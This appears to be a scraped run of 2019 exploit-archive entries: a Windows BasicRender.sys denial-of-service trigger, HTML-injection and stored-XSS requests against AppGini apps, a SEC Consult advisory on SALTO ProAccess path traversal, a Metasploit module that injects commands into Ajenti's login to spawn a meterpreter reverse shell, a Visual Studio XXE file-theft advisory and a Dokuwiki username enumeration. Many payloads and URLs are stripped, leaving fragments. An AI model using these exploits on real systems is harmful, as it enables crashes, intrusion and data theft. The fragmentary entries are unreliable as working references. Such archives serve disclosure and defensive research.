Microsoft Windows suffers from an issue where a null pointer deference exists in the WARPGPUCMDSYNC function of the BasicRender.sys driver. An unprivileged user can trigger the vulnerability to crash the system and deny the service to the rest of the users.

MD5 | 64e7b7be479ae3ec443e4544303c901c

A Null pointer deference exists in the WARPGPUCMDSYNC function of the
BasicRender.sys driver. An unprivileged user can trigger the vulnerability
to crash the system and deny the service to the rest of the users.



device = new D3DKMT_CREATEDEVICE();

D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
device->hAdapter = enumAdapter.Adapters[1].hAdapter;
logger(log_counter, "EnumAdapter");


memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));

contextVirtual->hDevice = device->hDevice;

char data[0x200] = { 0 };
memset(data, 0xff, 0x200);

contextVirtual->PrivateDriverDataSize = 0x200;
contextVirtual->pPrivateDriverData = data;

contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
contextVirtual->Flags.InitialData = 0x000001;
contextVirtual->Flags.NullRendering = 0x0;

submitCommand = new D3DKMT_SUBMITCOMMAND();

submitCommand->BroadcastContext[0] = 0x40000240;

for (int i = 0; i < 0x10; i++)
submitCommand->WrittenPrimaries[i] = 0x0;

submitCommand->PresentHistoryToken = 0x100;
submitCommand->Commands = 0x004b39;
submitCommand->CommandLength = 0x00000d;
submitCommand->BroadcastContext[0] = contextVirtual->hContext;
submitCommand->BroadcastContextCount = 0x1;
submitCommand->Flags.PresentRedirected = 0x1;

submitCommand->PrivateDriverDataSize = 0x130;

char* PrivateData = NULL;
PrivateData = new char[submitCommand->PrivateDriverDataSize];
memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);

*(DWORD*)(PrivateData + 0x118) = 0x434e5953;
*(DWORD*)(PrivateData + 0x11c) = 0x18;
*(DWORD*)(PrivateData + 0x120) = 0x000110;
*(DWORD*)(PrivateData + 0x124) = 0x000420;
*(DWORD*)(PrivateData + 0x128) = 0x0;
*(DWORD*)(PrivateData + 0x12c) = 0x000428;

submitCommand->pPrivateDriverData = PrivateData;


*Crash dump*:

8afae92c 8fe82cb2 8afae958 fffffffd 0000048c
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6
8afaea08 92b19db6 90114c30 8afaea68 b78da008
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860
8afaeb90 92b764a9 00000000 945f5a80 00000000
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15

eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
8fe8386c c7061060e88f mov dword ptr [esi],offset
BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
Resetting default scope


The vulnerability has only been tested in Windows 10 x86 1803.
CVSS Base Score: 5.5
Credit: Victor Portal


Cisco WLC 2504 version 8.9 suffers from a denial of service vulnerability.

MD5 | 9215aa968b49d3b98e32f665f3d9a9ea

# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage:
# Software Link:
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276

# Exploit PoC:


# Firing this code will cause the system to reload which results in a DoS condition.


Online Clinic Management System version 2.2 suffers from a html injection vulnerability.

MD5 | b2e8b9ed2bb7a8503bcc774fe443d4a1

# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage:
# Software Download Link :
# Software : Online Clinic Management System
# Version : 2.2
# Vulernability Type : HTML Injection
# Vulenrability : HTM Injection

# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini
# add disase symptom, patient and appointment section.
# payload: asd

# HTTP POST request

POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
POST /clinic/disease_symptoms_view.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------325041947016922
Content-Length: 1501
Connection: close
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="current_view"


Content-Disposition: form-data; name="SortField"
Content-Disposition: form-data; name="SelectedID"

Content-Disposition: form-data; name="SelectedField"

Content-Disposition: form-data; name="SortDirection"

Content-Disposition: form-data; name="FirstRecord"

Content-Disposition: form-data; name="NoDV"

Content-Disposition: form-data; name="PrintDV"

Content-Disposition: form-data; name="DisplayRecords"

Content-Disposition: form-data; name="disease"


Content-Disposition: form-data; name="symptoms"


Content-Disposition: form-data; name="reference"

Content-Disposition: form-data; name="update_x"

Content-Disposition: form-data; name="SearchString"


Online Invoicing System version 2.6 suffers from a persistent cross site scripting vulnerability.

MD5 | d8fbb7aa32b5447f037e171048323f77

# Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage:
# Software Download Link :
# Software : Online Invoicing System
# Version : 2.6
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS

# Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini
# editmembers section. Description parameter affected from this vulnerability.
# payload: alert(123);

# HTTP POST request
POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 464
Connection: close
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69
Upgrade-Insecure-Requests: 1



Intelbras Router RF1200 version 1.1.3 suffers from a cross site request forgery vulnerability.

MD5 | c32a1780d648466fdd3ed05a4ada139b

# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery 
# Date: 2019-11-06
# Exploit Author: Joas Antonio
# Vendor Homepage:
# Software Link:
# Version: 1.1.3 (REQUIRED)
# Tested on: Windows
# CVE : CVE-2019-19516



SALTO ProAccess SPACE versions 5.5 and below suffer from path traversal, arbitrary file write, persistent cross site scripting, privilege escalation, and clear text transmission of sensitive data vulnerabilities.

MD5 | 4ca7d9b553568cfa84f8e2a9b3783f36

SEC Consult Vulnerability Lab Security Advisory 
title: Multiple Critical Vulnerabilities
product: SALTO ProAccess SPACE
vulnerable version: <= v5.5
fixed version: >= v5.6
CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459,
impact: critical
found: 2019-05-22
by: Werner Schober (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America


Vendor description:
"SALTO ProAccess SPACE Software is a powerful access control management
tool that enables you to program access time zones for each user,
manage different calendars and obtain audit trails from each door
to see who has passed through it. The software includes special
functions such as automatic door status changes, anti-passback
and relay management.

Thanks to its advanced software features, SALTO ProAccess SPACE is also
one of the most user-friendly and powerful software products for the
access control management of stand-alone wireless devices, and IP
online devices in one converged complete access control platform
for the user, keys and doors management."


Business recommendation:
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.

Vulnerability overview/description:
1. Path Traversal (CVE-2019-19458)
Path traversal vulnerabilities allow attackers access to files
and directories outside the application root through relative file paths
in the user input. During a quick security check, multiple locations
in the web application were identified, which allow an attacker
to traverse outside of the application root. The vulnerabilities got
identified in the "Data Export" as well as "Database Export"
functionality. Those vulnerabilities can for example be used to dump the
whole database into the web root, by traversing outside of the application

2. Arbitrary File Write (CVE-2019-19459)
By further exploiting the path traversal vulnerability inside of the
"Data Export" feature, an attacker is able to traverse into arbitrary paths
and write arbitrary files with arbitrary contents. Some examples are files
to the web root, or bat files into auto start. This allows an attacker to
execute arbitrary commands on the server.

3. Stored Cross-Site-Scripting (CVE-2019-19457)
By adding devices to the SALTO network with a JavaScript payload inside of
certain parameters, an attacker is able to permanently embed arbitrary
JavaScript payloads inside of the web application.

4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460)
The webserver of the SALTO ProAccess SPACE is running as a Windows Service with
local SYSTEM permissions per default. This is against the principle of least
privilege. An attacker, who is able to exploit the path traversal, or arbitrary
file write vulnerability, is basically able to write to every single path
on the file system, because the webserver is running with the highest
privileges available.

5. Authorization Issues
Multiple API calls were identified in the SALTO ProAccess SPACE web application,
that could normally only be called by high privileged users. Nevertheless, by
directly calling the API with the OAuth token of a low privileged user, it was
possible to call some API calls that shouldn't be available to them.

6. Cleartext transmission of sensitive data
The SALTO ProAccess SPACE web application allows their users to create so called
event streams. Those streams can be used to log events centrally. The stream
is transmitted via TCP/UDP in JSON, or CSV format. The stream is transmitted in
cleartext and leaks sensitive data such as who opened which door and when
including card ids etc.

Proof of concept:
1. Path Traversal (CVE-2019-19458)
The "Data Export" as well as the "Database Export" features in
SALTO ProAccess SPACE allow users to specify a filename for the different
exports. By using special characters inside of the filename, an attacker is
able to traverse outside of the designated export path and place the exports
in arbitrary locations. For example, the following filename can be used
in the database export to store the database backup inside of the webroot:

........SALTOProAccess Spacebinwebappbackup.db

The file can then be easily retrieved via the following link without


2. Arbitrary File Write (CVE-2019-19459)
The vulnerability described above can be further developed into an arbitrary
file write vulnerability by using the "Data Export" functionality. The webapp
lets their users choose an export filename and the fields, which should be
exported (e.g. Username, Notes field). To store a file with arbitrary contents
on the file system the following steps have to be conducted:

a. Store the payload inside of an arbitrary field, that can be manipulated by the
user. (E.g. Username is set to ""
as an example for stored XSS)
b. Create a new export with the following export file name
"....SALTOProAccess Spacebinwebappsectest.html"
c. Finalize the export
d. Access the file without authentication via http(s)://$IP/sectest.html

3. Stored Cross-Site-Scripting (CVE-2019-19457)
By injecting arbitrary JavaScript payloads inside of the name of a SALTO
network device (e.g. RFID Wall Reader) an attacker is able to permanently
embed malicious JavaScript code inside of the web application that is
executed as soon as certain pages are visited.

4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460)
In a standard configuration the SALTO service, which is also serving the
webserver on port 8100 is running as a local windows service. Naturally, this
results in multiple issues. One of them is, that the webserver is automatically
running with SYSTEM privileges.

5. Authorization Issues
The following API calls can be accessed by a low privileged user without any
permissions (except login permissions) set:


Those API calls can be perfectly used to evaluate, which folders exist on the
file system.

6. Cleartext transmission of sensitive data
No PoC available.

Vulnerable / tested versions:
The following versions have been tested:
* Service Binary Version

Vendor contact timeline:
2019-05-24: Contacting vendor through
2019-05-24: Initial response from Salto Systems; providing a PGP public key for
encrypted communication
2019-05-24: Sending the encrypted advisory to Salto Systems
2019-06-11: Requesting a status update.
2019-06-12: Vendor responded with a detailed plan on how and when
the vulnerabilities are going to be fixed.
2019-09-02: Requesting status update.
2019-09-04: Vendor provides version information and further release plan updates
2019-09 - 2019-11: Multiple emails exchanged and telephone conferences discussing
the vulnerabilities
2019-12-02: Coordinated advisory release.

Update to SALTO ProAccess SPACE 5.6 which is available to customers through the
vendor's software area.

No workaround available.

Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult?
Send us your application

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices

Mail: research at sec-consult dot com

EOF Werner Schober / @2019


This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.

MD5 | 7c4130c9c91b99ff51567ab20d19ea6e

# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
'Name' => 'Ajenti auth username Command Injection',
'Description' => %q{
This module exploits a command injection in Ajenti == 2.1.31.
By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
'Author' => [
'Jeremy Brown', # Vulnerability discovery
'Onur ER ' # Metasploit module
'References' => [
['EDB', '47497']
'DisclosureDate' => '2019-10-14',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Privileged' => false,
'Targets' => [
['Ajenti == 2.1.31', {}]
'DefaultOptions' =>
'RPORT' => 8000,
'SSL' => true,
'payload' => 'python/meterpreter/reverse_tcp'
'DefaultTarget' => 0
register_options(['TARGETURI', [true, 'Base path', '/'])

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/view/login/normal'

unless res
vprint_error 'Connection failed'
return CheckCode::Unknown

unless res.body =~ /ajenti/i
return CheckCode::Safe

version = res.body.scan(/'ajentiVersion', '([d.]+)'/).flatten.first

if version
vprint_status "Ajenti version #{version}"

if version == '2.1.31'
return CheckCode::Appears


def exploit
json_body = { 'username' => "`python -c "#{payload.encoded}"`",
'password' => rand_text_alpha_lower(7),
'mode' => 'normal'
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)


sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

MD5 | c2cc97b70eead019d4bca860e3b7ce45


Microsoft Visual Studio 2008 Express IDE suffers from an XML external entity injection vulnerability.

MD5 | 789e0a22b8214672e24e1c11ee00b829

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website:
[+] Source:
[+] ISR: ApparitionSec


Visual Studio 2008 Express IDE
File hash: 62f764849e8fcdf8bfbc342685641304

[Vulnerability Type]
XML External Entity Injection 0Day

[CVE Reference]

[Security Issue]
Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.
By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the
remote attackers server.

Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get
associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.

[Vuln XXE file types]

This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.


"Evil.snippet" or any of the extensions mentioned above.

<!DOCTYPE knobgobslob [



<!ENTITY % all "">

python -m SimpleHTTPServer
python -m http.server (Python3)

[POC Video URL]

[Network Access]


[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC sent me link to "Definition of a Security Vulnerability"
Also Product is also not supported anymore.
December 1, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).



Dokuwiki version 2018-04-22b suffers from a username enumeration vulnerability.

MD5 | e7533fa839fdd496e040a3329ea00401

# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage:
# Software Link:
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :

# At login page there is a "set new password" page as below:
# Forgotten your password? Get a new one: Set new password
# At this page there is username enumeration vulnerability.
# Testing for non-valid user:

POST /doku.php?id=start&do=resendpwd HTTP/1.1


# Response for non-valid user(sss):

Sorry, we can't find this user in our database.


# Testing for valid user:

POST /doku.php?id=start&do=resendpwd HTTP/1.1


# Response for valid user (admin):

There was an unexpected problem communicating with SMTP: Could not open SMTP Port.

Looks like there was an error on sending the password mail. Please contact the admin!